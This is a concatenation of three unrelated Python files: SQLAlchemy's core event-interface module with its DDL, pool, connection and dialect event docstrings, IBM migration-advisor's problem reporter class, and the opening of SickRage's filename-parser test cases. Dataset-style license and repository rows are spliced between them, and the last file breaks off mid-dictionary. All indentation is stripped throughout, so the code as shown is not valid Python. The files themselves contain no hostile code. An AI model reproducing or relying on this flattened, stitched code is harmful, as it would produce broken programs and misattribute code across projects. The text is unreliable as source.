# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Core event interfaces."""
from . import event, exc
from .pool import Pool
from .engine import Connectable, Engine, Dialect
from .sql.base import SchemaEventTarget
class DDLEvents(event.Events):
"""
Define event listeners for schema objects,
that is, :class:`.SchemaItem` and other :class:`.SchemaEventTarget`
subclasses, including :class:`.MetaData`, :class:`.Table`,
:class:`.Column`.
:class:`.MetaData` and :class:`.Table` support events
specifically regarding when CREATE and DROP
DDL is emitted to the database.
Attachment events are also provided to customize
behavior whenever a child schema element is associated
with a parent, such as, when a :class:`.Column` is associated
with its :class:`.Table`, when a :class:`.ForeignKeyConstraint`
is associated with a :class:`.Table`, etc.
Example using the ``after_create`` event::
from sqlalchemy import event
from sqlalchemy import Table, Column, Metadata, Integer
m = MetaData()
some_table = Table('some_table', m, Column('data', Integer))
def after_create(target, connection, **kw):
connection.execute("ALTER TABLE %s SET name=foo_%s" %
(target.name, target.name))
event.listen(some_table, "after_create", after_create)
DDL events integrate closely with the
:class:`.DDL` class and the :class:`.DDLElement` hierarchy
of DDL clause constructs, which are themselves appropriate
as listener callables::
from sqlalchemy import DDL
event.listen(
some_table,
"after_create",
DDL("ALTER TABLE %(table)s SET name=foo_%(table)s")
)
The methods here define the name of an event as well
as the names of members that are passed to listener
functions.
See also:
:ref:`event_toplevel`
:class:`.DDLElement`
:class:`.DDL`
:ref:`schema_ddl_sequences`
"""
_target_class_doc = "SomeSchemaClassOrObject"
_dispatch_target = SchemaEventTarget
def before_create(self, target, connection, **kw):
"""Called before CREATE statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
CREATE statement or statements will be emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def after_create(self, target, connection, **kw):
"""Called after CREATE statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
CREATE statement or statements have been emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def before_drop(self, target, connection, **kw):
"""Called before DROP statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
DROP statement or statements will be emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def after_drop(self, target, connection, **kw):
"""Called after DROP statments are emitted.
:param target: the :class:`.MetaData` or :class:`.Table`
object which is the target of the event.
:param connection: the :class:`.Connection` where the
DROP statement or statements have been emitted.
:param \**kw: additional keyword arguments relevant
to the event. The contents of this dictionary
may vary across releases, and include the
list of tables being generated for a metadata-level
event, the checkfirst flag, and other
elements used by internal events.
"""
def before_parent_attach(self, target, parent):
"""Called before a :class:`.SchemaItem` is associated with
a parent :class:`.SchemaItem`.
:param target: the target object
:param parent: the parent to which the target is being attached.
:func:`.event.listen` also accepts a modifier for this event:
:param propagate=False: When True, the listener function will
be established for any copies made of the target object,
i.e. those copies that are generated when
:meth:`.Table.tometadata` is used.
"""
def after_parent_attach(self, target, parent):
"""Called after a :class:`.SchemaItem` is associated with
a parent :class:`.SchemaItem`.
:param target: the target object
:param parent: the parent to which the target is being attached.
:func:`.event.listen` also accepts a modifier for this event:
:param propagate=False: When True, the listener function will
be established for any copies made of the target object,
i.e. those copies that are generated when
:meth:`.Table.tometadata` is used.
"""
def column_reflect(self, inspector, table, column_info):
"""Called for each unit of 'column info' retrieved when
a :class:`.Table` is being reflected.
The dictionary of column information as returned by the
dialect is passed, and can be modified. The dictionary
is that returned in each element of the list returned
by :meth:`.reflection.Inspector.get_columns`.
The event is called before any action is taken against
this dictionary, and the contents can be modified.
The :class:`.Column` specific arguments ``info``, ``key``,
and ``quote`` can also be added to the dictionary and
will be passed to the constructor of :class:`.Column`.
Note that this event is only meaningful if either
associated with the :class:`.Table` class across the
board, e.g.::
from sqlalchemy.schema import Table
from sqlalchemy import event
def listen_for_reflect(inspector, table, column_info):
"receive a column_reflect event"
# ...
event.listen(
Table,
'column_reflect',
listen_for_reflect)
...or with a specific :class:`.Table` instance using
the ``listeners`` argument::
def listen_for_reflect(inspector, table, column_info):
"receive a column_reflect event"
# ...
t = Table(
'sometable',
autoload=True,
listeners=[
('column_reflect', listen_for_reflect)
])
This because the reflection process initiated by ``autoload=True``
completes within the scope of the constructor for :class:`.Table`.
"""
class PoolEvents(event.Events):
"""Available events for :class:`.Pool`.
The methods here define the name of an event as well
as the names of members that are passed to listener
functions.
e.g.::
from sqlalchemy import event
def my_on_checkout(dbapi_conn, connection_rec, connection_proxy):
"handle an on checkout event"
event.listen(Pool, 'checkout', my_on_checkout)
In addition to accepting the :class:`.Pool` class and
:class:`.Pool` instances, :class:`.PoolEvents` also accepts
:class:`.Engine` objects and the :class:`.Engine` class as
targets, which will be resolved to the ``.pool`` attribute of the
given engine or the :class:`.Pool` class::
engine = create_engine("postgresql://scott:tiger@localhost/test")
# will associate with engine.pool
event.listen(engine, 'checkout', my_on_checkout)
"""
_target_class_doc = "SomeEngineOrPool"
_dispatch_target = Pool
@classmethod
def _accept_with(cls, target):
if isinstance(target, type):
if issubclass(target, Engine):
return Pool
elif issubclass(target, Pool):
return target
elif isinstance(target, Engine):
return target.pool
else:
return target
def connect(self, dbapi_connection, connection_record):
"""Called at the moment a particular DBAPI connection is first
created for a given :class:`.Pool`.
This event allows one to capture the point directly after which
the DBAPI module-level ``.connect()`` method has been used in order
to produce a new DBAPI connection.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
"""
def first_connect(self, dbapi_connection, connection_record):
"""Called exactly once for the first time a DBAPI connection is
checked out from a particular :class:`.Pool`.
The rationale for :meth:`.PoolEvents.first_connect` is to determine
information about a particular series of database connections based
on the settings used for all connections. Since a particular
:class:`.Pool` refers to a single "creator" function (which in terms
of a :class:`.Engine` refers to the URL and connection options used),
it is typically valid to make observations about a single connection
that can be safely assumed to be valid about all subsequent connections,
such as the database version, the server and client encoding settings,
collation settings, and many others.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
"""
def checkout(self, dbapi_connection, connection_record, connection_proxy):
"""Called when a connection is retrieved from the Pool.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
:param connection_proxy: the :class:`._ConnectionFairy` object which
will proxy the public interface of the DBAPI connection for the lifespan
of the checkout.
If you raise a :class:`~sqlalchemy.exc.DisconnectionError`, the current
connection will be disposed and a fresh connection retrieved.
Processing of all checkout listeners will abort and restart
using the new connection.
.. seealso:: :meth:`.ConnectionEvents.engine_connect` - a similar event
which occurs upon creation of a new :class:`.Connection`.
"""
def checkin(self, dbapi_connection, connection_record):
"""Called when a connection returns to the pool.
Note that the connection may be closed, and may be None if the
connection has been invalidated. ``checkin`` will not be called
for detached connections. (They do not return to the pool.)
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
"""
def reset(self, dbapi_connnection, connection_record):
"""Called before the "reset" action occurs for a pooled connection.
This event represents
when the ``rollback()`` method is called on the DBAPI connection
before it is returned to the pool. The behavior of "reset" can
be controlled, including disabled, using the ``reset_on_return``
pool argument.
The :meth:`.PoolEvents.reset` event is usually followed by the
the :meth:`.PoolEvents.checkin` event is called, except in those
cases where the connection is discarded immediately after reset.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
.. versionadded:: 0.8
.. seealso::
:meth:`.ConnectionEvents.rollback`
:meth:`.ConnectionEvents.commit`
"""
def invalidate(self, dbapi_connection, connection_record, exception):
"""Called when a DBAPI connection is to be "invalidated".
This event is called any time the :meth:`._ConnectionRecord.invalidate`
method is invoked, either from API usage or via "auto-invalidation".
The event occurs before a final attempt to call ``.close()`` on the connection
occurs.
:param dbapi_connection: a DBAPI connection.
:param connection_record: the :class:`._ConnectionRecord` managing the
DBAPI connection.
:param exception: the exception object corresponding to the reason
for this invalidation, if any. May be ``None``.
.. versionadded:: 0.9.2 Added support for connection invalidation
listening.
.. seealso::
:ref:`pool_connection_invalidation`
"""
class ConnectionEvents(event.Events):
"""Available events for :class:`.Connectable`, which includes
:class:`.Connection` and :class:`.Engine`.
The methods here define the name of an event as well as the names of
members that are passed to listener functions.
An event listener can be associated with any :class:`.Connectable`
class or instance, such as an :class:`.Engine`, e.g.::
from sqlalchemy import event, create_engine
def before_cursor_execute(conn, cursor, statement, parameters, context,
executemany):
log.info("Received statement: %s" % statement)
engine = create_engine('postgresql://scott:tiger@localhost/test')
event.listen(engine, "before_cursor_execute", before_cursor_execute)
or with a specific :class:`.Connection`::
with engine.begin() as conn:
@event.listens_for(conn, 'before_cursor_execute')
def before_cursor_execute(conn, cursor, statement, parameters,
context, executemany):
log.info("Received statement: %s" % statement)
The :meth:`.before_execute` and :meth:`.before_cursor_execute`
events can also be established with the ``retval=True`` flag, which
allows modification of the statement and parameters to be sent
to the database. The :meth:`.before_cursor_execute` event is
particularly useful here to add ad-hoc string transformations, such
as comments, to all executions::
from sqlalchemy.engine import Engine
from sqlalchemy import event
@event.listens_for(Engine, "before_cursor_execute", retval=True)
def comment_sql_calls(conn, cursor, statement, parameters,
context, executemany):
statement = statement + " -- some comment"
return statement, parameters
.. note:: :class:`.ConnectionEvents` can be established on any
combination of :class:`.Engine`, :class:`.Connection`, as well
as instances of each of those classes. Events across all
four scopes will fire off for a given instance of
:class:`.Connection`. However, for performance reasons, the
:class:`.Connection` object determines at instantiation time
whether or not its parent :class:`.Engine` has event listeners
established. Event listeners added to the :class:`.Engine`
class or to an instance of :class:`.Engine` *after* the instantiation
of a dependent :class:`.Connection` instance will usually
*not* be available on that :class:`.Connection` instance. The newly
added listeners will instead take effect for :class:`.Connection`
instances created subsequent to those event listeners being
established on the parent :class:`.Engine` class or instance.
:param retval=False: Applies to the :meth:`.before_execute` and
:meth:`.before_cursor_execute` events only. When True, the
user-defined event function must have a return value, which
is a tuple of parameters that replace the given statement
and parameters. See those methods for a description of
specific return arguments.
.. versionchanged:: 0.8 :class:`.ConnectionEvents` can now be associated
with any :class:`.Connectable` including :class:`.Connection`,
in addition to the existing support for :class:`.Engine`.
"""
_target_class_doc = "SomeEngine"
_dispatch_target = Connectable
@classmethod
def _listen(cls, event_key, retval=False):
target, identifier, fn = \
event_key.dispatch_target, event_key.identifier, event_key.fn
target._has_events = True
if not retval:
if identifier == 'before_execute':
orig_fn = fn
def wrap_before_execute(conn, clauseelement,
multiparams, params):
orig_fn(conn, clauseelement, multiparams, params)
return clauseelement, multiparams, params
fn = wrap_before_execute
elif identifier == 'before_cursor_execute':
orig_fn = fn
def wrap_before_cursor_execute(conn, cursor, statement,
parameters, context, executemany):
orig_fn(conn, cursor, statement,
parameters, context, executemany)
return statement, parameters
fn = wrap_before_cursor_execute
elif retval and \
identifier not in ('before_execute', 'before_cursor_execute'):
raise exc.ArgumentError(
"Only the 'before_execute' and "
"'before_cursor_execute' engine "
"event listeners accept the 'retval=True' "
"argument.")
event_key.with_wrapper(fn).base_listen()
def before_execute(self, conn, clauseelement, multiparams, params):
"""Intercept high level execute() events, receiving uncompiled
SQL constructs and other objects prior to rendering into SQL.
This event is good for debugging SQL compilation issues as well
as early manipulation of the parameters being sent to the database,
as the parameter lists will be in a consistent format here.
This event can be optionally established with the ``retval=True``
flag. The ``clauseelement``, ``multiparams``, and ``params``
arguments should be returned as a three-tuple in this case::
@event.listens_for(Engine, "before_execute", retval=True)
def before_execute(conn, conn, clauseelement, multiparams, params):
# do something with clauseelement, multiparams, params
return clauseelement, multiparams, params
:param conn: :class:`.Connection` object
:param clauseelement: SQL expression construct, :class:`.Compiled`
instance, or string statement passed to :meth:`.Connection.execute`.
:param multiparams: Multiple parameter sets, a list of dictionaries.
:param params: Single parameter set, a single dictionary.
See also:
:meth:`.before_cursor_execute`
"""
def after_execute(self, conn, clauseelement, multiparams, params, result):
"""Intercept high level execute() events after execute.
:param conn: :class:`.Connection` object
:param clauseelement: SQL expression construct, :class:`.Compiled`
instance, or string statement passed to :meth:`.Connection.execute`.
:param multiparams: Multiple parameter sets, a list of dictionaries.
:param params: Single parameter set, a single dictionary.
:param result: :class:`.ResultProxy` generated by the execution.
"""
def before_cursor_execute(self, conn, cursor, statement,
parameters, context, executemany):
"""Intercept low-level cursor execute() events before execution,
receiving the string
SQL statement and DBAPI-specific parameter list to be invoked
against a cursor.
This event is a good choice for logging as well as late modifications
to the SQL string. It's less ideal for parameter modifications except
for those which are specific to a target backend.
This event can be optionally established with the ``retval=True``
flag. The ``statement`` and ``parameters`` arguments should be
returned as a two-tuple in this case::
@event.listens_for(Engine, "before_cursor_execute", retval=True)
def before_cursor_execute(conn, cursor, statement,
parameters, context, executemany):
# do something with statement, parameters
return statement, parameters
See the example at :class:`.ConnectionEvents`.
:param conn: :class:`.Connection` object
:param cursor: DBAPI cursor object
:param statement: string SQL statement
:param parameters: Dictionary, tuple, or list of parameters being
passed to the ``execute()`` or ``executemany()`` method of the
DBAPI ``cursor``. In some cases may be ``None``.
:param context: :class:`.ExecutionContext` object in use. May
be ``None``.
:param executemany: boolean, if ``True``, this is an ``executemany()``
call, if ``False``, this is an ``execute()`` call.
See also:
:meth:`.before_execute`
:meth:`.after_cursor_execute`
"""
def after_cursor_execute(self, conn, cursor, statement,
parameters, context, executemany):
"""Intercept low-level cursor execute() events after execution.
:param conn: :class:`.Connection` object
:param cursor: DBAPI cursor object. Will have results pending
if the statement was a SELECT, but these should not be consumed
as they will be needed by the :class:`.ResultProxy`.
:param statement: string SQL statement
:param parameters: Dictionary, tuple, or list of parameters being
passed to the ``execute()`` or ``executemany()`` method of the
DBAPI ``cursor``. In some cases may be ``None``.
:param context: :class:`.ExecutionContext` object in use. May
be ``None``.
:param executemany: boolean, if ``True``, this is an ``executemany()``
call, if ``False``, this is an ``execute()`` call.
"""
def dbapi_error(self, conn, cursor, statement, parameters,
context, exception):
"""Intercept a raw DBAPI error.
This event is called with the DBAPI exception instance
received from the DBAPI itself, *before* SQLAlchemy wraps the
exception with it's own exception wrappers, and before any
other operations are performed on the DBAPI cursor; the
existing transaction remains in effect as well as any state
on the cursor.
The use case here is to inject low-level exception handling
into an :class:`.Engine`, typically for logging and
debugging purposes. In general, user code should **not** modify
any state or throw any exceptions here as this will
interfere with SQLAlchemy's cleanup and error handling
routines.
Subsequent to this hook, SQLAlchemy may attempt any
number of operations on the connection/cursor, including
closing the cursor, rolling back of the transaction in the
case of connectionless execution, and disposing of the entire
connection pool if a "disconnect" was detected. The
exception is then wrapped in a SQLAlchemy DBAPI exception
wrapper and re-thrown.
:param conn: :class:`.Connection` object
:param cursor: DBAPI cursor object
:param statement: string SQL statement
:param parameters: Dictionary, tuple, or list of parameters being
passed to the ``execute()`` or ``executemany()`` method of the
DBAPI ``cursor``. In some cases may be ``None``.
:param context: :class:`.ExecutionContext` object in use. May
be ``None``.
:param exception: The **unwrapped** exception emitted directly from the
DBAPI. The class here is specific to the DBAPI module in use.
.. versionadded:: 0.7.7
"""
def engine_connect(self, conn, branch):
"""Intercept the creation of a new :class:`.Connection`.
This event is called typically as the direct result of calling
the :meth:`.Engine.connect` method.
It differs from the :meth:`.PoolEvents.connect` method, which
refers to the actual connection to a database at the DBAPI level;
a DBAPI connection may be pooled and reused for many operations.
In contrast, this event refers only to the production of a higher level
:class:`.Connection` wrapper around such a DBAPI connection.
It also differs from the :meth:`.PoolEvents.checkout` event
in that it is specific to the :class:`.Connection` object, not the
DBAPI connection that :meth:`.PoolEvents.checkout` deals with, although
this DBAPI connection is available here via the :attr:`.Connection.connection`
attribute. But note there can in fact
be multiple :meth:`.PoolEvents.checkout` events within the lifespan
of a single :class:`.Connection` object, if that :class:`.Connection`
is invalidated and re-established. There can also be multiple
:class:`.Connection` objects generated for the same already-checked-out
DBAPI connection, in the case that a "branch" of a :class:`.Connection`
is produced.
:param conn: :class:`.Connection` object.
:param branch: if True, this is a "branch" of an existing
:class:`.Connection`. A branch is generated within the course
of a statement execution to invoke supplemental statements, most
typically to pre-execute a SELECT of a default value for the purposes
of an INSERT statement.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.PoolEvents.checkout` the lower-level pool checkout event
for an individual DBAPI connection
:meth:`.ConnectionEvents.set_connection_execution_options` - a copy of a
:class:`.Connection` is also made when the
:meth:`.Connection.execution_options` method is called.
"""
def set_connection_execution_options(self, conn, opts):
"""Intercept when the :meth:`.Connection.execution_options`
method is called.
This method is called after the new :class:`.Connection` has been
produced, with the newly updated execution options collection, but
before the :class:`.Dialect` has acted upon any of those new options.
Note that this method is not called when a new :class:`.Connection`
is produced which is inheriting execution options from its parent
:class:`.Engine`; to intercept this condition, use the
:meth:`.ConnectionEvents.engine_connect` event.
:param conn: The newly copied :class:`.Connection` object
:param opts: dictionary of options that were passed to the
:meth:`.Connection.execution_options` method.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.ConnectionEvents.set_engine_execution_options` - event
which is called when :meth:`.Engine.execution_options` is called.
"""
def set_engine_execution_options(self, engine, opts):
"""Intercept when the :meth:`.Engine.execution_options`
method is called.
The :meth:`.Engine.execution_options` method produces a shallow
copy of the :class:`.Engine` which stores the new options. That new
:class:`.Engine` is passed here. A particular application of this
method is to add a :meth:`.ConnectionEvents.engine_connect` event
handler to the given :class:`.Engine` which will perform some per-
:class:`.Connection` task specific to these execution options.
:param conn: The newly copied :class:`.Engine` object
:param opts: dictionary of options that were passed to the
:meth:`.Connection.execution_options` method.
.. versionadded:: 0.9.0
.. seealso::
:meth:`.ConnectionEvents.set_connection_execution_options` - event
which is called when :meth:`.Connection.execution_options` is called.
"""
def begin(self, conn):
"""Intercept begin() events.
:param conn: :class:`.Connection` object
"""
def rollback(self, conn):
"""Intercept rollback() events, as initiated by a
:class:`.Transaction`.
Note that the :class:`.Pool` also "auto-rolls back"
a DBAPI connection upon checkin, if the ``reset_on_return``
flag is set to its default value of ``'rollback'``.
To intercept this
rollback, use the :meth:`.PoolEvents.reset` hook.
:param conn: :class:`.Connection` object
.. seealso::
:meth:`.PoolEvents.reset`
"""
def commit(self, conn):
"""Intercept commit() events, as initiated by a
:class:`.Transaction`.
Note that the :class:`.Pool` may also "auto-commit"
a DBAPI connection upon checkin, if the ``reset_on_return``
flag is set to the value ``'commit'``. To intercept this
commit, use the :meth:`.PoolEvents.reset` hook.
:param conn: :class:`.Connection` object
"""
def savepoint(self, conn, name):
"""Intercept savepoint() events.
:param conn: :class:`.Connection` object
:param name: specified name used for the savepoint.
"""
def rollback_savepoint(self, conn, name, context):
"""Intercept rollback_savepoint() events.
:param conn: :class:`.Connection` object
:param name: specified name used for the savepoint.
:param context: :class:`.ExecutionContext` in use. May be ``None``.
"""
def release_savepoint(self, conn, name, context):
"""Intercept release_savepoint() events.
:param conn: :class:`.Connection` object
:param name: specified name used for the savepoint.
:param context: :class:`.ExecutionContext` in use. May be ``None``.
"""
def begin_twophase(self, conn, xid):
"""Intercept begin_twophase() events.
:param conn: :class:`.Connection` object
:param xid: two-phase XID identifier
"""
def prepare_twophase(self, conn, xid):
"""Intercept prepare_twophase() events.
:param conn: :class:`.Connection` object
:param xid: two-phase XID identifier
"""
def rollback_twophase(self, conn, xid, is_prepared):
"""Intercept rollback_twophase() events.
:param conn: :class:`.Connection` object
:param xid: two-phase XID identifier
:param is_prepared: boolean, indicates if
:meth:`.TwoPhaseTransaction.prepare` was called.
"""
def commit_twophase(self, conn, xid, is_prepared):
"""Intercept commit_twophase() events.
:param conn: :class:`.Connection` object
:param xid: two-phase XID identifier
:param is_prepared: boolean, indicates if
:meth:`.TwoPhaseTransaction.prepare` was called.
"""
class DialectEvents(event.Events):
"""event interface for execution-replacement functions.
These events allow direct instrumentation and replacement
of key dialect functions which interact with the DBAPI.
.. note::
:class:`.DialectEvents` hooks should be considered **semi-public**
and experimental.
These hooks are not for general use and are only for those situations where
intricate re-statement of DBAPI mechanics must be injected onto an existing
dialect. For general-use statement-interception events, please
use the :class:`.ConnectionEvents` interface.
.. seealso::
:meth:`.ConnectionEvents.before_cursor_execute`
:meth:`.ConnectionEvents.before_execute`
:meth:`.ConnectionEvents.after_cursor_execute`
:meth:`.ConnectionEvents.after_execute`
.. versionadded:: 0.9.4
"""
_target_class_doc = "SomeEngine"
_dispatch_target = Dialect
@classmethod
def _listen(cls, event_key, retval=False):
target, identifier, fn = \
event_key.dispatch_target, event_key.identifier, event_key.fn
target._has_events = True
event_key.base_listen()
@classmethod
def _accept_with(cls, target):
if isinstance(target, type):
if issubclass(target, Engine):
return Dialect
elif issubclass(target, Dialect):
return target
elif isinstance(target, Engine):
return target.dialect
else:
return target
def do_executemany(self, cursor, statement, parameters, context):
"""Receive a cursor to have executemany() called.
Return the value True to halt further events from invoking,
and to indicate that the cursor execution has already taken
place within the event handler.
"""
def do_execute_no_params(self, cursor, statement, context):
"""Receive a cursor to have execute() with no parameters called.
Return the value True to halt further events from invoking,
and to indicate that the cursor execution has already taken
place within the event handler.
"""
def do_execute(self, cursor, statement, parameters, context):
"""Receive a cursor to have execute() called.
Return the value True to halt further events from invoking,
and to indicate that the cursor execution has already taken
place within the event handler.
"""
| gpl-3.0 |
open-power-sdk/migration-advisor | ma/problem_reporter.py | 1 | 5434 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2017 IBM Corporation
Licensed under the Apache License, Version 2.0 (the “License”);
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an “AS IS” BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contributors:
* Roberto Oliveira <rdutra@br.ibm.com>
* Diego Fernandez-Merjildo <merjildo@br.ibm.com>
"""
from . import core
from .report_blocker import ReportBlocker
class ProblemReporter(object):
""" Class to handle with reported problems """
problems = {}
@classmethod
def report_include(cls, name, file_name, line, problem_type, problem_msg,
solution):
""" Report a problem in an include directive """
if not cls.__should_report(file_name, line, file_name):
return
name = "include " + name
problem = Problem(name, file_name, line, problem_msg, solution)
cls.__report_problem(problem, problem_type)
@classmethod
def report_node(cls, node, current_file, problem_type, problem_msg,
solution):
""" Report a problem in a node """
node_loc = node.location
node_file = node_loc.file
node_line = node_loc.line
if not cls.__should_report(node_file, node_line, current_file):
return
name = core.get_raw_node(node)
problem = Problem(name, node_file, node_line, problem_msg, solution)
cls.__report_problem(problem, problem_type)
@classmethod
def report_file(cls, file_name, num_line, name, problem_type, problem_msg,
solution):
""" Report a problem in a file """
if not cls.__should_report(file_name, num_line, file_name):
return
problem = Problem(name, file_name, num_line, problem_msg, solution)
cls.__report_problem(problem, problem_type)
@classmethod
def __report_problem(cls, problem, problem_type):
""" Add the reported problem in a dictionary """
if cls.problems.get(problem_type, None) is not None:
cls.problems.get(problem_type).append(problem)
else:
problem_list = []
problem_list.append(problem)
cls.problems[problem_type] = problem_list
@classmethod
def print_problems(cls):
""" Print all reported problems """
if not cls.problems:
print("\nNo migration reports found.")
return
tab = " "
cls.__print_logo()
for problem_type, problems in cls.problems.items():
problems_dict = {}
# Group problems by file
for problem in problems:
name = problem.file_name
problems_dict[name] = problems_dict.get(name, []) + [problem]
print("Problem type: " + problem_type)
print("Problem description: " + problems[0].problem_msg)
for file_name, problems in problems_dict.items():
print(tab + "File: " + file_name)
for problem in problems:
print((tab * 2) + "Line: " + str(problem.line))
print((tab * 2) + "Problem: " + str(problem.name))
if problem.solution:
print((tab * 2) + "Solution: " + problem.solution)
print("")
print("")
@classmethod
def get_problems(cls):
""" Get all reported problems """
return cls.problems
@classmethod
def clear_problems(cls):
""" Clear reported problems """
cls.problems.clear()
@classmethod
def __should_report(cls, node_file, node_line, current_file):
""" Check if should report the node """
# Location is not known
if not node_file:
return False
# Node is not in the current file
if str(node_file) != current_file:
return False
# Node is inside a blocked line
if node_line in ReportBlocker.blocked_lines:
return False
return True
@classmethod
def __print_logo(cls):
""" Print the report logo """
title = "Migration Report"
border = "=" * len(title)
print("")
print(border)
print(title)
print(border)
class Problem(object):
""" Class to represent a problem """
def __init__(self, name, file_name, line, problem_msg, solution):
self._name = name
self._file_name = str(file_name)
self._line = line
self._problem_msg = problem_msg
self._solution = solution
@property
def name(self):
""" Raw name """
return self._name
@property
def problem_msg(self):
""" Problem message """
return self._problem_msg
@property
def solution(self):
""" Solution for the problem """
return self._solution
@property
def file_name(self):
""" File name """
return self._file_name
@property
def line(self):
""" Line number """
return self._line
| apache-2.0 |
srluge/SickRage | tests/name_parser_tests.py | 1 | 17619 | import sys, os.path
sys.path.insert(1, os.path.abspath(os.path.join(os.path.dirname(__file__), '../lib')))
sys.path.insert(1, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import datetime
import unittest
from tests import test_lib as test
import sickbeard
from sickbeard import tv
from sickbeard.name_parser import parser
from sickrage.helper.encoding import ek
sickbeard.SYS_ENCODING = 'UTF-8'
DEBUG = VERBOSE = False
simple_test_cases = {
'standard': {
'Mr.Show.Name.S01E02.Source.Quality.Etc-Group': parser.ParseResult(None, 'Mr Show Name', 1, [2], 'Source.Quality.Etc', 'Group'),
'Show.Name.S01E02': parser.ParseResult(None, 'Show Name', 1, [2]),
'Show Name - S01E02 - My Ep Name': parser.ParseResult(None, 'Show Name', 1, [2], 'My Ep Name'),
'Show.1.0.Name.S01.E03.My.Ep.Name-Group': parser.ParseResult(None, 'Show 1.0 Name', 1, [3], 'My.Ep.Name', 'Group'),
'Show.Name.S01E02E03.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'Source.Quality.Etc', 'Group'),
'Mr. Show Name - S01E02-03 - My Ep Name': parser.ParseResult(None, 'Mr. Show Name', 1, [2, 3], 'My Ep Name'),
'Show.Name.S01.E02.E03': parser.ParseResult(None, 'Show Name', 1, [2, 3]),
'Show.Name-0.2010.S01E02.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name-0 2010', 1, [2], 'Source.Quality.Etc', 'Group'),
'S01E02 Ep Name': parser.ParseResult(None, None, 1, [2], 'Ep Name'),
'Show Name - S06E01 - 2009-12-20 - Ep Name': parser.ParseResult(None, 'Show Name', 6, [1], '2009-12-20 - Ep Name'),
'Show Name - S06E01 - -30-': parser.ParseResult(None, 'Show Name', 6, [1], '30-'),
'Show-Name-S06E01-720p': parser.ParseResult(None, 'Show-Name', 6, [1], '720p'),
'Show-Name-S06E01-1080i': parser.ParseResult(None, 'Show-Name', 6, [1], '1080i'),
'Show.Name.S06E01.Other.WEB-DL': parser.ParseResult(None, 'Show Name', 6, [1], 'Other.WEB-DL'),
'Show.Name.S06E01 Some-Stuff Here': parser.ParseResult(None, 'Show Name', 6, [1], 'Some-Stuff Here')
},
'fov': {
'Show_Name.1x02.Source_Quality_Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2], 'Source_Quality_Etc', 'Group'),
'Show Name 1x02': parser.ParseResult(None, 'Show Name', 1, [2]),
'Show Name 1x02 x264 Test': parser.ParseResult(None, 'Show Name', 1, [2], 'x264 Test'),
'Show Name - 1x02 - My Ep Name': parser.ParseResult(None, 'Show Name', 1, [2], 'My Ep Name'),
'Show_Name.1x02x03x04.Source_Quality_Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2, 3, 4], 'Source_Quality_Etc', 'Group'),
'Show Name - 1x02-03-04 - My Ep Name': parser.ParseResult(None, 'Show Name', 1, [2, 3, 4], 'My Ep Name'),
'1x02 Ep Name': parser.ParseResult(None, None, 1, [2], 'Ep Name'),
'Show-Name-1x02-720p': parser.ParseResult(None, 'Show-Name', 1, [2], '720p'),
'Show-Name-1x02-1080i': parser.ParseResult(None, 'Show-Name', 1, [2], '1080i'),
'Show Name [05x12] Ep Name': parser.ParseResult(None, 'Show Name', 5, [12], 'Ep Name'),
'Show.Name.1x02.WEB-DL': parser.ParseResult(None, 'Show Name', 1, [2], 'WEB-DL')
},
'standard_repeat': {
'Show.Name.S01E02.S01E03.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'Source.Quality.Etc', 'Group'),
'Show.Name.S01E02.S01E03': parser.ParseResult(None, 'Show Name', 1, [2, 3]),
'Show Name - S01E02 - S01E03 - S01E04 - Ep Name': parser.ParseResult(None, 'Show Name', 1, [2, 3, 4], 'Ep Name'),
'Show.Name.S01E02.S01E03.WEB-DL': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'WEB-DL')
},
'fov_repeat': {
'Show.Name.1x02.1x03.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'Source.Quality.Etc', 'Group'),
'Show.Name.1x02.1x03': parser.ParseResult(None, 'Show Name', 1, [2, 3]),
'Show Name - 1x02 - 1x03 - 1x04 - Ep Name': parser.ParseResult(None, 'Show Name', 1, [2, 3, 4], 'Ep Name'),
'Show.Name.1x02.1x03.WEB-DL': parser.ParseResult(None, 'Show Name', 1, [2, 3], 'WEB-DL')
},
'bare': {
'Show.Name.102.Source.Quality.Etc-Group': parser.ParseResult(None, 'Show Name', 1, [2], 'Source.Quality.Etc', 'Group'),
'show.name.2010.123.source.quality.etc-group': parser.ParseResult(None, 'show name 2010', 1, [23], 'source.quality.etc', 'group'),
